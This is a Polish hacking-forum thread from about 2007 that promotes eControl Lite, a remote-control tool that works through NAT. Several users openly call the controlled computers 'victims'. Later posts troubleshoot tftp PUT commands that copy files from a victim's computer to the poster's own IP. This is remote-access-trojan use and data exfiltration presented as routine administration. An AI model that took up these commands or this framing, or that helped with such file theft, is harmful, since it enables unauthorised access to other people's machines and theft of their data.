Nowy program do zdalnej administracji eControl Lite

FDJ

Były Moderator
Dołączył
Maj 23, 2005
Posty
1044
Powstal nowy program do zdalnej administracji oparty na wlasnym protokole.
Zasada dzialania:
CLIENT-SERWER-CLIENT
,a nie jak w przypadku większości tego typu programów
CLIENT-SERWER
gdzie administrowany komputer musiał być w naszej sieci, bądź mieć publiczny adres IP.

prog.jpg


Strona projektu i wieksze info: http://lite.econtrol.pl/

Maile z prosba o haslo + powod korzystania na adres: [email protected]

Nie jestem autorem programu
smile.gif
 

Eltrial

Użytkownik
Dołączył
Kwiecień 27, 2004
Posty
325
Dobra robota.
Napewno przyda mi się do "administracji" ;]

Pozdrawiam, eltrial.
 

Kornik52

Były Moderator
Dołączył
Sierpień 12, 2004
Posty
848
Chociaż wersja lite ma tylko dostep do wersza poleceń naprawdę warto zobaczyć program szybkość połączenia z ofiarą jest wprost niesamowita!.
 

kapusta_kiszona

Użytkownik
Dołączył
Listopad 24, 2006
Posty
3
w przyszlosci przewidywane wiecej opcjii
mam nadzieje, ze sie spodoba i bedzie mozna szybko OPŁACIC SERWER
<



pozdrawiam
mafiamix
 

Triniti

Użytkownik
Dołączył
Styczeń 29, 2007
Posty
17
Mam mały problemik.

Po bezproblemowym wygenerowaniu serwera, przy próbie odpalenia serer.exe na swoim komputerze wyskakuje bład aplikacji i zostaje ona zamknieta, w rezultacie czego proces .exe nie jest widoczny a menedzeże oraz nie widać serwera w econtrol-licie.


Jakies sugestie? Czy po prostu nei da sie odpalic serwera i klienta na tym samym komputerze?
 

3rr0rx

Użytkownik
Dołączył
Luty 10, 2007
Posty
712
Wszystko działa jak należy. Program extra, szybkość odpowiedzi wprost błyskawiczna.
Nic tylko Polecić.
<
k:
 

econtrol

Użytkownik
Dołączył
Luty 5, 2007
Posty
8
Odpowiedź

Witam
Serdecznie dziękuję za testowanie naszego projektu. Na dzień dzisiejszy utworzono ponad 1200 kont i 3600 serwerów. Serwer główny obsługuje w tym momencie 700 połączeń, a ich ilość z dnia na dzień rośnie. Na wasze wszystkie pytania i prośby o hasło odpowiemy zarówno drogą e-mail [email protected] jak i poprzez gadu-gadu: 8770055

Mile widziane komentarze, zarówno te pozytywne jak i te mniej


Pozdrawiam
Programista eControl lite
smile.gif


P.S
w przyszłości planujemy napisać komponent obsługujący nasz protokół wówczas każdy z was bedzie mógł w łatwy sposób utworzyć własny serwer posiadajający takie funckje jakie potrzebujecie. Gdy znajdę odrobinę czasu napiszę wersję full posiadającą mase funkcji.
Jesteśmy otwarci na współprace twórców innych programów tego typu udostepniając im, (jak narazie) nasz niezawodny protokół.
 

tofik_

Użytkownik
Dołączył
Luty 9, 2007
Posty
17
Witam, mam pytanie odnosnie przesylania plików od "osoby u korej jest serwer" wszystko super polonczylem sie z nią, osoba jest w swojej sieci wewnetrzej innej niz moja i wpisuje komende

TFTP -i 192.168.0.23 PUT C:toto.dat toto.dat


oczywiscie gdzie podane ip jest moje z wewnetrzej sieci, i gdy po tak wpisanej komendzie dam enter
wyskakuje limit czasu upłynol ??
oczywiscie w tle mam odpalony program Tftp32, ktorego chyba nie trzeba jakos specjalnie konfigurowac ?? co robie nie tak ?? prosze o pomoc
 

kapusta_kiszona

Użytkownik
Dołączył
Listopad 24, 2006
Posty
3
tofik -> nie mozesz uzyc tftp jesli nie masz zewnetrznego ip chyba ze ci admin ustawi fowarda portow

wlasnie w tym celu powstal ten projekt - zeby ulatwic sterowanie komputerem gdy oba kompy sa za natem - ale tftp to juz zupelnie inny program ktory nie dziala na takiej samej zasadzie jak econtrol - do niego musisz miec niestety zewnetrznego

w kolejnych wersjach napewno pojawi sie transfer plikow
ale na to trzeba poczekac
 

tofik_

Użytkownik
Dołączył
Luty 9, 2007
Posty
17
znaczy jak ja bede mial publiczne a osoba od ktorej chce cos sciagnac bedzie w swojej wewnetrzej sieci, to tftp bede mogl cos od niej sciagnac ??
 

econtrol

Użytkownik
Dołączył
Luty 5, 2007
Posty
8
Jest możliwość przesyłania plików poprzez eControl lite. Jak wyzdrowieje to opisze dokładnie jak to zrobić.
 

3rr0rx

Użytkownik
Dołączył
Luty 10, 2007
Posty
712
Originally posted by econtrol
Jest możliwość przesyłania plików poprzez eControl lite. Jak wyzdrowieje to opisze dokładnie jak to zrobić.

To czekam z nie cierpliowścią
smile.gif
bo mam ten sam problem co w/w kolega powiedział.
 

tofik_

Użytkownik
Dołączył
Luty 9, 2007
Posty
17
Bardzo mi na Tym zalezy, chodzi mi o przesylanie plików przez Econtrol, naprawde jest to bardzo dla mnie istotne prosze o pomoc. pozdrawiam tofik moj gg
 

3rr0rx

Użytkownik
Dołączył
Luty 10, 2007
Posty
712
a9fe0d76ca387d4f.jpg


hmm cóż takiego źle robie ? wpisuje jak pisze w tym twoim opisie ale nie działa ;|
jakieś rady ;] ?
 

3rr0rx

Użytkownik
Dołączył
Luty 10, 2007
Posty
712
kopiuje skrót tak tylko dla próby ;]
a wpisuje tak:
tftp -i [MOJE IP] PUT [Ścieżka do pliku który chcę pobrać z komputera ofiary] [nazwa pod jaką plik ma być zapisany]
 
Do góry Bottom